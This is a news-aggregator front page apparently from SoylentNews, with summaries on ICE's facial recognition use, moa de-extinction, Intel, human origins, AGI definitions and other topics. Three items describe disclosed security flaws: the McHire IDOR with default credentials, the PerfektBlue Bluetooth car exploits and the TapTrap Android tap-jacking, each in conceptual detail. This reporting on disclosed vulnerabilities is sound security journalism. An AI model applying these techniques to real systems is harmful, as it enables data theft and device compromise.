Join our Folding@Home team:
Main F@H site
Our team page
Support us: Subscribe Here
and buy SoylentNews Swag
We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.
Juan Carlos Lopez-Gomez, despite his U.S. citizenship and Social Security card, was arrested on April 16 on an unfounded suspicion of him being an "unauthorized alien." Immigration and Customs Enforcement kept him in county jail for 30 hours "based on biometric confirmation of his identity"—an obvious mistake of facial recognition technology. Another U.S. citizen, Jensy Machado, was held at gunpoint and handcuffed by ICE agents. He was another victim of mistaken identity after someone else gave his home address on a deportation order. This is the reality of immigration policing in 2025: Arrest first, verify later.
That risk only grows as ICE shreds due process safeguards, citizens and noncitizens alike face growing threats from mistaken identity, and immigration policing agencies increasingly embrace error-prone technology, especially facial recognition. Last month, it was revealed that Customs and Border Protection requested pitches from tech firms to expand their use of an especially error-prone facial recognition technology—the same kind of technology used wrongly to arrest and jail Lopez-Gomez. ICE already has nearly $9 million in contracts with Clearview AI, a facial recognition company with white nationalist ties that was at one point the private facial recognition system most used by federal agencies. When reckless policing is combined with powerful and inaccurate dragnet tools, the result will inevitably be more stories like Lopez-Gomez's and Machado's.
Studies have shown that facial recognition technology is disproportionately likely to misidentify people of color, especially Black women. And with the recent rapid increase of ICE activity, facial recognition risks more and more people arbitrarily being caught in ICE's dragnet without rights to due process to prove their legal standing. Even for American citizens who have "nothing to hide," simply looking like the wrong person can get you jailed or even deported.
While facial recognition's mistakes are dangerous, its potential for abuse when working as intended is even scarier. For example, facial recognition lets Donald Trump use ICE as a more powerful weapon for retribution. The president himself admits he's using immigration enforcement to target people for their political opinions and that he seeks to deport people regardless of citizenship. In the context of a presidential administration that is uncommonly willing to ignore legal procedures and judicial orders, a perfectly accurate facial recognition system could be the most dangerous possibility of all: Federal agents could use facial recognition on photos and footage of protests to identify each of the president's perceived enemies, and they could be arrested and even deported without due process rights.
And the more facial recognition technology expands across our daily lives, the more dangerous it becomes. By working with local law enforcement and private companies, including by sharing facial recognition technology, ICE is growing their ability to round people up—beyond what they already can do. This deputization of surveillance infrastructure comes in many forms: Local police departments integrate facial recognition into their body cameras, landlords use facial recognition instead of a key to admit or deny tenants, and stadiums use facial recognition for security. Even New York public schools used facial recognition on their security camera footage until a recent moratorium. Across the country, other states and municipalities have imposed regulations on facial recognition in general, including Boston, San Francisco, Portland, and Vermont. Bans on the technology in schools specifically have been passed in Florida and await the governor's signature in Colorado. Any facial recognition, no matter its intended use, is at inherent risk of being handed over to ICE for indiscriminate or politically retaliatory deportations.
Arthur T Knackerbracket has processed the following story:
Colossal Biosciences has announced plans to “de-extinct” the New Zealand moa, one of the world’s largest and most iconic extinct birds, but critics say the company’s goals remain scientifically impossible.
The moa was the only known completely wingless bird, lacking even the vestigial wings of birds like emus. There were once nine species of moa in New Zealand, ranging from the turkey-sized bush moa (Anomalopteryx didiformis) to the two biggest species, the South Island giant moa (Dinornis robustus) and North Island giant moa (Dinornis novaezealandiae), which both reached heights of 3.6 metres and weights of 230 kilograms.
It is thought that all moa species were hunted to extinction by the mid-15th century, following the arrival of Polynesian people, now known as Māori, to New Zealand sometime around 1300.
Colossal has announced that it will work with the Indigenous Ngāi Tahu Research Centre, based at the University of Canterbury in New Zealand, along with film-maker Peter Jackson and Canterbury Museum, which holds the largest collection of moa remains in the world. These remains will play a key role in the project, as Colossal aims to extract DNA to sequence and rebuild the genomes for all nine moa species.
As with Colossal’s other “de-extinction” projects, the work will involve modifying the genomes of animals still living today. Andrew Pask at the University of Melbourne, Australia, who is a scientific adviser to Colossal, says that although the moa’s closest living relatives are the tinamou species from Central and South America, they are comparatively small.
This means the project will probably rely on the much larger Australian emu (Dromaius novaehollandiae). “What emus have is very large embryos, very large eggs,” says Pask. “And that’s one of the things that you definitely need to de-extinct a moa.”
[...] But Philip Seddon at the University of Otago, New Zealand, says that whatever Colossal produces, it won’t be a moa, but rather a “possible look-alike with some very different features”. He points out that although the tinamou is the moa’s closest relative, the two diverged 60 million years ago.
“The bottom line is that Colossal’s approach to de-extinction uses genetic engineering to alter a near-relative of an extinct species to create a GMO [genetically-modified organism] that resembles the extinct form,” he says. “There is nothing much to do with solving the global extinction crisis and more to do with generating fundraising media coverage.”
Pask strongly disputes this sentiment and says the knowledge being gained through de-extinction projects will be critically important to helping save endangered species today.
“They may superficially have some moa traits, but are unlikely to behave as moa did or be able to occupy the same ecological niches, which will perhaps relegate them to no more than objects of curiosity,“ says Wood.
Sir Peter Jackson backs project to de-extinct moa, experts cast doubt:
A new project backed by film-maker Sir Peter Jackson aims to bring the extinct South Island giant moa back to life in less than eight years.
The South Island giant moa stood up to 3.6 metres tall, weighed around 230kg and typically lived in forests and shrubbery.
Moa hatchlings could be a reality within a decade, says the company behind the project.
Using advanced genetic engineering, iwi Ngāi Tahu, Canterbury Museum, and US biotech firm Colossal Biosciences plan to extract DNA from preserved moa remains to recreate the towering flightless bird.
However, Zoology Professor Emeritus Philip Seddon from the University of Otago is sceptical.
"Extinction really is forever. There is no current genetic engineering pathway that can truly restore a lost species, especially one missing from its ecological and evolutionary context for hundreds of years," he told the Science Media Centre.
He said a five to 10-year timeframe for the project provided enough leeway to "drip feed news of genetically modifying some near relative of the moa".
"Any end result will not, cannot be, a moa - a unique treasure created through millenia of adaptation and change. Moa are extinct. Genetic tinkering with the fundamental features of a different life force will not bring moa back."
University of Otago Palaeogenetics Laboratory director Dr Nic Rawlence is also not convinced the country will see the massive flightless bird making a comeback.
He said the project came across as "very glossy" but scientfically the ambition was "a pipedream".
"The technology isn't available yet. It definitely won't be done in five to 10 years ... but also they won't be de-extincting a moa, they'll be creating a genetically engineered emu."
It might look like a moa but it was really "a smokescreen", he told Midday Report.
See also:
From '123456' Password Exposed Chats for 64 Million McDonald's Job Applicants
Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the chats of more than 64 million job applicants across the United States.
The flaw was discovered by security researchers Ian Carroll and Sam Curry, who found that the ChatBot's admin panel utilized a test franchise that was protected by weak credentials of a login name "123456" and a password of "123456".
McHire, powered by Paradox.ai and used by about 90% of McDonald's franchisees, accepts job applications through a chatbot named Olivia. Applicants can submit names, email addresses, phone numbers, home addresses, and availability, and are required to complete a personality test as part of the job application process.
Once logged in, the researchers submitted a job application to the test franchise to see how the process worked.
During this test, they noticed that HTTP requests were sent to an API endpoint at /api/lead/cem-xhr, which used a parameter lead_id, which in their case was 64,185,742.
The researchers found that by incrementing and decrementing the lead_id parameter, they were able to expose the full chat transcripts, session tokens, and personal data of real job applicants that previously applied on McHire.
This type of flaw is called an IDOR (Insecure Direct Object Reference) vulnerability, which is when an application exposes internal object identifiers, such as record numbers, without verifying whether the user is actually authorized to access the data.
"During a cursory security review of a few hours, we identified two serious issues: the McHire administration interface for restaurant owners accepted the default credentials 123456:123456, and an insecure direct object reference (IDOR) on an internal API allowed us to access any contacts and chats we wanted," Carroll explained in a writeup about the flaw.
"Together they allowed us and anyone else with a McHire account and access to any inbox to retrieve the personal data of more than 64 million applicants."
In this case, incrementing or decrementing a lead_id number in a request returned sensitive data belonging to other applicants, as the API failed to check if the user had access to the data.
The issue was reported to Paradox.ai and McDonald's on June 30.
McDonald's acknowledged the report within an hour, and the default admin credentials were disabled soon after.
Arthur T Knackerbracket has processed the following story:
Climate change could pose a threat to the technology industry as copper production is vulnerable to drought, while demand may grow to outstrip supply anyway.
According to a report out today from PricewaterhouseCoopers (PwC), copper mines require a steady water supply to function, and many are situated in places around the world that face a growing risk of severe drought due to shifts in climate.
Copper is almost ubiquitous in IT hardware because of its excellent electrical conductivity, from the tracks on circuit boards to cabling and even the interconnects on microchips. PwC's report focuses just on chips, and claims that nearly a third (32 percent) of global semiconductor production will be reliant on copper supplies that are at risk from climate disruption by 2035.
If something is not done to rein in climate change, like drastically cutting greenhouse gas emissions, then the share of copper supply at risk rises to 58 percent by 2050, PwC claims. As this seems increasingly unlikely, it advises both copper exporters and semiconductor buyers to adapt their supply chains and practices if they are to ride out the risk.
Currently, of the countries or territories that supply the semiconductor industry with copper, the report states that only Chile faces severe drought risks. But within a decade, copper mines in the majority of the 17 countries that source the metal will be facing severe drought risks.
PwC says there is an urgent need to strengthen supply chain resilience. Some businesses are taking action, but many investors believe companies should step up their efforts when it comes to de-risking their supply chain, the firm adds.
According to the report, mining companies can alleviate some of the supply issues by investing in desalination plants, improving water efficiency and recycling water.
Semiconductor makers could use alternative materials, diversify their suppliers, and adopt measures such as recycling and taking advantage of the circular economy.
[...] This was backed up recently by the International Energy Agency (IEA), which reckons supplies of copper will fall 30 percent short of the volume required by 2035 if nothing is done to open up new sources.
One solution is for developed countries to do more refining of copper – plus other key metals needed for industry – and form partnerships with developing countries to help open up supplies, executive director Fatih Birol told The Guardian.
Arthur T Knackerbracket has processed the following story:
Humans come from Africa. This wasn’t always obvious, but today it seems as close to certain as anything about our origins.
There are two senses in which this is true. The oldest known hominins, creatures more closely related to us than to great apes, are all from Africa, going back as far as 7 million years ago. And the oldest known examples of our species, Homo sapiens, are also from Africa.
It’s the second story I’m focusing on here, the origin of modern humans in Africa and their subsequent expansion all around the world. With the advent of DNA sequencing in the second half of the 20th century, it became possible to compare the DNA of people from different populations. This revealed that African peoples have the most variety in their genomes, while all non-African peoples are relatively similar at the genetic level (no matter how superficially different we might appear in terms of skin colour and so forth).
In genetic terms, this is what we might call a dead giveaway. It tells us that Africa was our homeland and that it was populated by a diverse group of people – and that everyone who isn’t African is descended from a small subset of the peoples, who left this homeland to wander the globe. Geneticists were confident about this as early as 1995, and the evidence has only accumulated since.
And yet, the physical archaeology and the genetics don’t match – at least, not on the face of it.
Genetics tells us that all living non-African peoples are descended from a small group that left the continent around 50,000 years ago. Barring some wobbles about the exact date, that has been clear for two decades. But archaeologists can point to a great many instances of modern humans living outside Africa much earlier than that.
What is going on? Is our wealth of genetic data somehow misleading us? Or is it true that we are all descended from that last big migration – and the older bones represent populations that didn’t survive?
Eleanor Scerri at the Max Planck Institute of Geoanthropology in Germany and her colleagues have tried to find an explanation.
The team was discussing where modern humans lived in Africa. “Were humans simply moving into contiguous regions of African grasslands, or were they living in very different environments?” says Scerri.
To answer that, they needed a lot of data.
“We started with looking at all of the archaeological sites in Africa that date to 120,000 years ago to 14,000 years ago,” says Emily Yuko Hallett at Loyola University Chicago in Illinois. She and her colleagues built a database of sites and then determined the climates at specific places and times: “It was going through hundreds and hundreds of archaeological site reports and publications.”
We once shared the planet with at least seven other types of human. Ironically, our success may have been due to our deepest vulnerability: being dependent on others
There was an obvious shift around 70,000 years ago. “Even if you just look at the data without any fancy modelling, you do see that there is this change in the conditions,” says Andrea Manica at the University of Cambridge, UK. The range of temperatures and rainfalls where humans were living expanded significantly. “They start getting into the deeper forests, the drier deserts.”
However, it wasn’t enough to just eyeball the data. The archaeological record is incomplete, and biased in many ways.
“In some areas, you have no sites,” says Michela Leonardi at the Natural History Museum in London – but that could be because nothing has been preserved, not because humans were absent. “And for more recent periods, you have more data just because it’s more recent, so it’s easier for it to be conserved.”
Leonardi had developed a statistical modelling technique that could determine whether animals had changed their environmental niche: that is, whether they had started living under different climatic conditions or in a different type of habitat like a rainforest instead of a grassland. The team figured that applying this to the human archaeological record would be a two-week job, says Leonardi. “That was five and a half years ago.”
However, the statistics eventually did confirm what they initially saw: about 70,000 years ago, modern humans in Africa started living in a much wider range of environments. The team published their results on 18 June.
“What we’re seeing at 70,000 [years ago] is almost kind of our species becoming the ultimate generalist,” says Manica. From this time forwards, modern humans moved into an ever-greater range of habitats.
It would be easy to misunderstand this. The team absolutely isn’t saying that earlier H. sapiens weren’t adaptable. On the contrary: one of the things that has emerged from the study of extinct hominins is that the lineage that led to us became increasingly adaptable as time went on.
“People are in different environments from an early stage,” says Scerri. “We know they’re in mangrove forests, they’re in rainforest, they’re in the edges of deserts. They’re going up into highland regions in places like Ethiopia.”
This adaptability seems to be how early Homo survived environmental changes in Africa, while our Paranthropus cousins didn’t: Paranthropus was too committed to a particular lifestyle and was unable to change.
The other humans: The emerging story of the mysterious Denisovans
The existence of the Denisovans was discovered just a decade ago through DNA alone. Now we're starting to uncover fossils and artefacts revealing what these early humans were like
Instead, what seems to have happened in our species 70,000 years ago is that this existing adaptability was turned up to 11.
Some of this isn’t obvious until you consider just how diverse habitats are. “People have an understanding that there’s one type of desert, one type of rainforest,” says Scerri. “There aren’t. There are many different types. There’s lowland rainforest, montane rainforest, swamp forest, seasonally inundated forest.” The same kind of range is seen in deserts.
Earlier H. sapiens groups were “not exploiting the full range of potential habitats available to them”, says Scerri. “Suddenly, we see the beginnings of that around 70,000 years ago, where they’re exploiting more types of woodland, more types of rainforest.”
This success story struck me, because recently I’ve been thinking about the opposite.
Early humans spread as far north as Siberia 400,000 years ago
A site in Siberia has evidence of human presence 417,000 years ago, raising the possibility that hominins could have reached North America much earlier than we thought
Last week, I published a story about local human extinctions: groups of H. sapiens that seem to have died out without leaving any trace in modern populations. I focused on some of the first modern humans to enter Europe after leaving Africa, who seem to have struggled with the cold climate and unfamiliar habitats, and ultimately succumbed. These lost groups fascinated me: why did they fail, when another group that entered Europe just a few thousand years later succeeded so enormously?
The finding that humans in Africa expanded their niche from 70,000 years ago seems to offer a partial explanation. If these later groups were more adaptable, that would have given them a better chance of coping with the unfamiliar habitats of northern Europe – and for that matter, South-East Asia, Australia and the Americas, where their descendants would ultimately travel.
One quick note of caution: this doesn’t mean that from 70,000 years ago, human populations were indestructible. “It’s not like all humans suddenly developed into some massive success stories,” says Scerri. “Many of these populations died out, within and beyond Africa.”
And like all the best findings, the study raises as many questions as it answers. In particular: how and why did modern humans became more adaptable 70,000 years ago?
Manica points out that we can also see a shift in the shapes of our skeletons. Older fossils classed as H. sapiens don’t have all the features we associate with humans today, just some of them. “From 70,000 [years ago] onwards, roughly speaking, suddenly you see all these traits present as a package,” he says.
Upstart has processed the PerfektBlue Bluetooth Vulnerabilities Expose Millions of Vehicles to Remote Code Execution the following story:
Cybersecurity researchers have discovered a set of four security flaws in OpenSynergy's BlueSDK Bluetooth stack that, if successfully exploited, could allow remote code execution on millions of transport vehicles from different vendors.
The vulnerabilities, dubbed PerfektBlue, can be fashioned together as an exploit chain to run arbitrary code on cars from at least three major automakers, Mercedes-Benz, Volkswagen, and Skoda, according to PCA Cyber Security (formerly PCAutomotive). Outside of these three, a fourth unnamed original equipment manufacturer (OEM) has been confirmed to be affected as well.
"PerfektBlue exploitation attack is a set of critical memory corruption and logical vulnerabilities found in OpenSynergy BlueSDK Bluetooth stack that can be chained together to obtain Remote Code Execution (RCE)," the cybersecurity company said.
While infotainment systems are often seen as isolated from critical vehicle controls, in practice, this separation depends heavily on how each automaker designs internal network segmentation. In some cases, weak isolation allows attackers to use IVI access as a springboard into more sensitive zones—especially if the system lacks gateway-level enforcement or secure communication protocols.
The only requirement to pull off the attack is that the bad actor needs to be within range and be able to pair their setup with the target vehicle's infotainment system over Bluetooth. It essentially amounts to a one-click attack to trigger over-the-air exploitation.
"However, this limitation is implementation-specific due to the framework nature of BlueSDK," PCA Cyber Security added. "Thus, the pairing process might look different between various devices: limited/unlimited number of pairing requests, presence/absence of user interaction, or pairing might be disabled completely."
The list of identified vulnerabilities is as follows -
- CVE-2024-45434 (CVSS score: 8.0) - Use-After-Free in AVRCP service
- CVE-2024-45431 (CVSS score: 3.5) - Improper validation of an L2CAP channel's remote CID
- CVE-2024-45433 (CVSS score: 5.7) - Incorrect function termination in RFCOMM
- CVE-2024-45432 (CVSS score: 5.7) - Function call with incorrect parameter in RFCOMM
Successfully obtaining code execution on the In-Vehicle Infotainment (IVI) system enables an attacker to track GPS coordinates, record audio, access contact lists, and even perform lateral movement to other systems and potentially take control of critical software functions of the car, such as the engine.
Following responsible disclosure in May 2024, patches were rolled out in September 2024.
"PerfektBlue allows an attacker to achieve remote code execution on a vulnerable device," PCA Cyber Security said. "Consider it as an entrypoint to the targeted system which is critical. Speaking about vehicles, it's an IVI system. Further lateral movement within a vehicle depends on its architecture and might involve additional vulnerabilities."
Earlier this April, the company presented a series of vulnerabilities that could be exploited to remotely break into a Nissan Leaf electric vehicle and take control of critical functions. The findings were presented at the Black Hat Asia conference held in Singapore.
"Our approach began by exploiting weaknesses in Bluetooth to infiltrate the internal network, followed by bypassing the secure boot process to escalate access," it said.
"Establishing a command-and-control (C2) channel over DNS allowed us to maintain a covert, persistent link with the vehicle, enabling full remote control. By compromising an independent communication CPU, we could interface directly with the CAN bus, which governs critical body elements, including mirrors, wipers, door locks, and even the steering."
CAN, short for Controller Area Network, is a communication protocol mainly used in vehicles and industrial systems to facilitate communication between multiple electronic control units (ECUs). Should an attacker with physical access to the car be able to tap into it, the scenario opens the door for injection attacks and impersonation of trusted devices.
"One notorious example involves a small electronic device hidden inside an innocuous object (like a portable speaker)," the Hungarian company said. "Thieves covertly plug this device into an exposed CAN wiring junction on the car."
"Once connected to the car's CAN bus, the rogue device mimics the messages of an authorized ECU. It floods the bus with a burst of CAN messages declaring 'a valid key is present' or instructing specific actions like unlocking the doors."
In a report published late last month, Pen Test Partners revealed it turned a 2016 Renault Clio into a Mario Kart controller by intercepting CAN bus data to gain control of the car and mapping its steering, brake, and throttle signals to a Python-based game controller.
Arthur T Knackerbracket has processed the following story:
Intel Ceo Says It's "Too Late" For Them To Catch Up With Ai Competition -Reportedly Claims Intel Has Fallen Out Of The "Top 10 Semiconductor Companies" As The Firm Lays Off Thousands Across The World
Dark days ahead, or perhaps already here.
Intel has been in a dire state these past few years, with seemingly nothing going right. Its attempt to modernize x86 with a hybrid big.LITTLE architecture, à la ARM, failed to make a meaningful impact in terms of market share gains, only made worse by last-gen's Arrow Lake chips barely registering a response against AMD’s lineup. On the GPU front, the Blue Team served an undercooked product far too late that, while not entirely hopeless, was nowhere near enough to challenge the industry’s dominant players. All of this compounds into a grim reality, seemingly confirmed by new CEO Lip-Bu Tan in a leaked internal conversation today.
According to OregonTech, it's borderline a fight for survival for the once-great American innovation powerhouse as it struggles to even acknowledge being among the top contenders anymore. Despite Tan's insistence, Intel would still rank fairly well given its extensive legacy. While companies like AMD, Nvidia, Apple, TSMC, and even Samsung might be more successful today, smaller chipmakers like Broadcom, MediaTek, Micron, and SK Hynix are not above the Blue Team in terms of sheer impact. Regardless, talking to employees around the world in a Q&A session, Intel's CEO allegedly shared these bleak words: "Twenty, 30 years ago, we were really the leader. Now I think the world has changed. We are not in the top 10 semiconductor companies."
As evident from the quote, this is a far cry from a few decades ago when Intel essentially held a monopoly over the CPU market, making barely perceptible upgrades each generation in order to sustain its dominance. At one time, Intel was so powerful that it considered acquiring Nvidia for $20 billion. The GPU maker is now worth $4 trillion.
It never saw AMD as an honorable competitor until it was too late, and Ryzen pulled the carpet from underneath the Blue Team's feet. Now, more people choose to build an AMD system than ever before. Not only that, but AMD also powers your favorite handhelds like the Steam Deck and Rog Ally X, alongside the biggest consoles: Xbox Series and PlayStation 5. AMD works closely with TSMC, another one of Intel's competitors, as the company makes its own chips in-house.
This vertical alignment was once a core strength for the firm, but it has turned into more of a liability these days. Faltering nodes that can't quite match the prowess of Taiwan have arguably held back Intel's processors from reaching their full potential. In fact, starting in 2023, the company tasked TSMC with manufacturing the GPU tile on its Meteor Lake chips. This partnership extended to TSMC, essentially making the entire compute tile for Lunar Lake—and now, in 2025, roughly 30% of fabrication has been outsourced to TSMC. A long-overdue admission of failure that could've been prevented had Intel been allowed to make its leading-edge CPUs with external manufacturing in mind from the start. Ultimately its own foundry was the limiting factor.
As such, Intel has been laying off thousands across the world in a bid to cut costs. Costs have skyrocketed due to high R&D spending for future nodes, and the company faces a $16 billion loss in Q3 last year. Intel's resurrection has to be a "marathon," said Tan, as he hopes to turn around the company culture and "be humble" in listening to shifting demands of the industry. Intel wants to be more like AMD and NVIDIA, who are faster, meaner, and more ruthless competitors these days, especially with the advent of AI. Of course, artificial intelligence has been around for a while, but it wasn't until OpenAI's ChatGPT that a second big bang occurred, ushering in a new era of machine learning. An era almost entirely powered by Nvidia's data center GPUs, highlighting another sector where Intel failed to capitalize on its position.
"On training, I think it is too late for us," Lip-Bu Tan remarked. Intel instead plans to shift its focus toward edge AI, aiming to bring AI processing directly to devices like PCs rather than relying on cloud-based compute. Tan also highlighted agentic AI—an emerging field where AI systems can act autonomously without constant human input—as a key growth area. He expressed optimism that recent high-level hires could help steer Intel back into relevance in AI, hinting that more talent acquisitions are on the way. “Stay tuned. A few more people are coming on board,” said Tan. At this point, Nvidia is simply too far ahead to catch up to, so it's almost exciting to see Intel change gears and look to close the gap in a different way.
That being said, Intel now lags behind in data center CPUs, too, where AMD's EPYC lineup has overtaken them in the past year, further dwindling the company's confidence. Additionally, last year, Intel's board forced former CEO Pat Gelsinger out of the company and replaced him with Lip-Bu Tan, who appears to have a distinctly different, more streamlined vision for the company. Instead of focusing on several different facets, such as CPU, GPU, foundry, and more, at once, Lip wants to hone in on what the company can do well at one time.
This development follows long-standing rumors of Intel splitting in two and forming a new foundry division that would act as an independent subsidiary, turning the main Intel into a fabless chipmaker. Both AMD and Apple, Intel's rivals in the CPU market, operate like this, and Nvidia has also always used TSMC or Samsung to build its graphics cards. It would be interesting to see the Blue Team shed off weight and move like a free animal in the biome. However, it's too early to speculate given that 18A, Intel's proposed savior, is still a year away.
Derinkuyu: A Subterranean Marvel of Ancient Engineering:
Beneath the sun-drenched plains of Cappadocia, where otherworldly "fairy chimney" rock formations pierce the sky, lies a secret world carved into the very heart of the earth.Forget the grand pyramids or towering ziggurats; we're about to descend into Derinkuyu, an ancient metropolis swallowed by the ground, a testament to human resilience and a whisper from a forgotten past.
Imagine a civilization, facing threats we can only dimly perceive, choosing not to build up, but to delve down, creating a labyrinthine sanctuary that could shelter thousands. This isn't just an archaeological site; it's a subterranean saga etched in stone, waiting to unfold its mysteries. Its origins are somewhat debated, but the prevailing archaeological consensus points to construction likely beginning in the Phrygian period (around the 8th-7th centuries BCE). The Phrygians, an Indo-European people who established a significant kingdom in Anatolia, were known for their rock-cut architecture, and Derinkuyu bears hallmarks of their early techniques.
However, the city's expansion and more complex features likely developed over centuries, with significant contributions from later periods, particularly the Byzantine era (roughly 4th to 15th centuries CE). During this time, Cappadocia was a crucial region for early Christianity, and the need for refuge from various invasions and raids, first from Arab forces and later from the Seljuk Turks, would have spurred the further development and extensive use of these underground complexes.
The city served as a refuge during times of conflict, allowing people to escape from invaders. The underground city could accommodate up to 20,000 people, along with their livestock and supplies, making it a significant shelter during turbulent times. The city extends approximately 60 meters deep and consists of multiple levels—around 18 floors! Each level was designed for specific purposes, such as living quarters, storage rooms, and even places of worship.
The geological context is crucial here. Cappadocia's unique landscape is characterized by soft volcanic tuff, formed by ancient eruptions. This malleable rock was relatively easy to carve, yet strong enough to support the extensive network of tunnels and chambers without collapsing – a testament to the engineering acumen of its builders.
Now, let's talk about the ingenuity of the design. Derinkuyu wasn't just a series of haphazard tunnels; it was a carefully planned multi-level settlement designed for extended habitation. Key features include:
Ventilation Systems: Remarkably, the city possessed sophisticated ventilation shafts that extended down through multiple levels, ensuring a constant supply of fresh air. Some of these shafts are believed to have also served as wells.
Water Management: Evidence of wells and water storage areas highlights the critical need for a sustainable water supply during times of siege.
Defensive Measures: The massive circular stone doors, capable of sealing off corridors from the inside, are a clear indication of the city's primary function as a refuge. These "rolling stones" could weigh several tons and were designed to be moved by a small number of people from within.
Living and Communal Spaces: Excavations have revealed evidence of domestic areas, including kitchens (with soot-stained ceilings indicating fireplaces), sleeping quarters, and communal gathering spaces.
Agricultural Infrastructure: The presence of stables suggests that livestock were also brought underground, a vital consideration for long-term survival. Storage rooms for grains and other foodstuffs further underscore the self-sufficiency of the city during times of crisis.
Religious and Educational Facilities: Some levels appear to have housed areas that may have served as chapels or even rudimentary schools, indicating that life, even in hiding, continued beyond mere survival.
The connection to other underground cities in the region, such as Kaymaklı, via subterranean tunnels adds another layer of complexity to the understanding of these networks. It suggests a potentially interconnected system of refuges, allowing for communication and possibly even the movement of people between them in times of extreme danger.
The rediscovery of Derinkuyu in modern times is also an interesting chapter. It was reportedly found in 1969 by a local resident who stumbled upon a hidden entrance while renovating his house. Subsequent archaeological investigations have gradually revealed the extent and significance of this subterranean marvel.
While the precise dating and the identity of the original builders are still subjects of scholarly debate, the evidence strongly suggests a prolonged period of construction and use, adapting to the needs of successive populations facing various threats. Derinkuyu stands as a powerful example of human adaptation, resourcefulness, and the enduring need for shelter and security throughout history. It offers a unique window into the as stood the test of time and continues to captivate the imagination of all who encounter it.
See also:
A novel tap-jacking technique can exploit user interface animations to bypass Android's permission system and allow access to sensitive data or trick users into performing destructive actions, such as wiping the device.
Unlike traditional, overlay-based tap-jacking, TapTrap attacks work even with zero-permission apps to launch a harmless transparent activity on top of a malicious one, a behavior that remains unmitigated in Android 15 and 16.
TapTrap was developed by a team of security researchers at TU Wien and the University of Bayreuth (Philipp Beer, Marco Squarcina, Sebastian Roth, Martina Lindorfer), and will be presented next month at the USENIX Security Symposium.
However, the team has already published a technical paper that outlines the attack and a website that summarizes most of the details.
How TapTrap worksTapTrap abuses the way Android handles activity transitions with custom animations to create a visual mismatch between what the user sees and what the device actually registers.
A malicious app installed on the target device launches a sensitive system screen (permission prompt, system setting, etc.) from another app using 'startActivity()' with a custom low-opacity animation.
"The key to TapTrap is using an animation that renders the target activity nearly invisible," the researchers say on a website that explains the attack.
"This can be achieved by defining a custom animation with both the starting and ending opacity (alpha) set to a low value, such as 0.01," thus making the malicious or risky activity almost completely transparent.
"Optionally, a scale animation can be applied to zoom into a specific UI element (e.g., a permission button), making it occupy the full screen and increasing the chance the user will tap it."
Although the launched prompt receives all touch events, all the user sees is the underlying app that displays its own UI elements, as on top of it is the transparent screen the user actually engages with.
Thinking they interact with the benign app, a user may tap on specific screen positions that correspond to risky actions, such as an "Allow" or "Authorize" buttons on nearly invisible prompts.
A video released by the researchers demonstrates how a game app could leverage TapTrap to enable camera access for a website via Chrome browser.
To check if TapTrap could work with applications in Play Store, the official Android repository, the researchers analyzed close to 100,000. They found that 76% of them are vulnerable to TapTrap as they include a screen ("activity") that meets the following conditions:
can be launched by another app
runs in the same task as the calling app
does not override the transition animation
does not wait for the animation to finish before reacting to user inputThe researchers say that animations are enabled on the latest Android version unless the user disables them from the developer options or accessibility settings, exposing the devices to TapTrap attacks.
While developing the attack, the researchers used Android 15, the latest version at the time, but after Android 16 came out they also ran some tests on it.
Marco Squarcina told BleepingComputer that they tried TapTrap on a Google Pixel 8a running Android 16 and they can confirm that the issue remains unmitigated.
GrapheneOS, the mobile operating system focused on privacy and security, also confirmed to BleepingComputer that the latest Android 16 is vulnerable to the TapTrap technique, and announced that the their next release will include a fix.
BleepingComputer has contacted Google about TapTrap, and a spokesperson said that the TapTrap problem will be mitigated in a future update:
"Android is constantly improving its existing mitigations against tap-jacking attacks. We are aware of this research and we will be addressing this issue in a future update. Google Play has policies in place to keep users safe that all developers must adhere to, and if we find that an app has violated our policies, we take appropriate action."- a Google representative told BleepingComputer.
When is an AI system intelligent enough to be called artificial general intelligence (AGI)? According to one definition reportedly agreed upon by Microsoft and OpenAI, the answer lies in economics: When AI generates $100 billion in profits. This arbitrary profit-based benchmark for AGI perfectly captures the definitional chaos plaguing the AI industry.
In fact, it may be impossible to create a universal definition of AGI, but few people with money on the line will admit it.
Over this past year, several high-profile people in the tech industry have been heralding the seemingly imminent arrival of "AGI" (i.e., within the next two years). [...] As Google DeepMind wrote in a paper on the topic: If you ask 100 AI experts to define AGI, you'll get "100 related but different definitions." [...] When companies claim they're on the verge of AGI, what exactly are they claiming?
This isn't just academic navel-gazing. The definition problem has real consequences for how we develop, regulate, and think about AI systems. When companies claim they're on the verge of AGI, what exactly are they claiming?
I tend to define AGI in a traditional way that hearkens back to the "general" part of its name: An AI model that can widely generalize—applying concepts to novel scenarios—and match the versatile human capability to perform unfamiliar tasks across many domains without needing to be specifically trained for them.
However, this definition immediately runs into thorny questions about what exactly constitutes "human-level" performance. Expert-level humans? Average humans? And across which tasks—should an AGI be able to perform surgery, write poetry, fix a car engine, and prove mathematical theorems, all at the level of human specialists? (Which human can do all that?) More fundamentally, the focus on human parity is itself an assumption; it's worth asking why mimicking human intelligence is the necessary yardstick at all.
The latest example of trouble resulting from this definitional confusion comes from the deteriorating relationship between Microsoft and OpenAI. According to The Wall Street Journal, the two companies are now locked in acrimonious negotiations partly because they can't agree on what AGI even means—despite having baked the term into a contract worth over $13 billion.
[...] For decades, the Turing Test served as the de facto benchmark for machine intelligence. [...] But the Turing Test has shown its age. Modern language models can pass some limited versions of the test not because they "think" like humans, but because they're exceptionally capable at creating highly plausible human-sounding outputs.
Perhaps the most systematic attempt to bring order to this chaos comes from Google DeepMind, which in July 2024 proposed a framework with five levels of AGI performance: emerging, competent, expert, virtuoso, and superhuman. DeepMind researchers argued that no level beyond "emerging AGI" existed at that time. Under their system, today's most capable LLMs and simulated reasoning models still qualify as "emerging AGI"—equal to or somewhat better than an unskilled human at various tasks.
But this framework has its critics. Heidy Khlaaf, chief AI scientist at the nonprofit AI Now Institute, told TechCrunch that she thinks the concept of AGI is too ill-defined to be "rigorously evaluated scientifically." In fact, with so many varied definitions at play, one could argue that the term AGI has become technically meaningless.
[...] The Microsoft-OpenAI dispute illustrates what happens when philosophical speculation is turned into legal obligations. When the companies signed their partnership agreement, they included a clause stating that when OpenAI achieves AGI, it can limit Microsoft's access to future technology. According to The Wall Street Journal, OpenAI executives believe they're close to declaring AGI, while Microsoft CEO Satya Nadella, on the Dwarkesh Patel podcast in February, has called the idea of using AGI as a self-proclaimed milestone "nonsensical benchmark hacking."
